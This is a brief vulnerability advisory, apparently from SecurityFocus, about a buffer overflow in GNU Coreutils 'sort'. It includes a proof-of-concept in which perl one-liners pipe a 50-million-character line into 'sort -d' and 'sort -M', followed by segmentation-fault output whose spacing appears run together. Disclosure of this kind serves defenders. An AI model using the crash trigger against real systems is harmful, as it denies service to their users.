source: https://www.securityfocus.com/bid/57492/info
GNU Coreutils is prone to a buffer-overflow vulnerability because it fails to properly bounds check user-supplied input.
A local attacker can exploit this issue to crash the affected application, denying service to legitimate users. Due to the nature of this issue, arbitrary code-execution may be possible; however this has not been confirmed.
% perl -e'print "1","A"x50000000,"\r\n\r\n"'|sort-d[1]13431done perl -e'print "1","A"x50000000,"\r\n\r\n"'|13432 segmentation fault sort-d
% perl -e'print "1","A"x50000000,"\r\n\r\n"'|sort-M[1]13433done perl -e'print "1","A"x50000000,"\r\n\r\n"'|13434 segmentation fault sort-M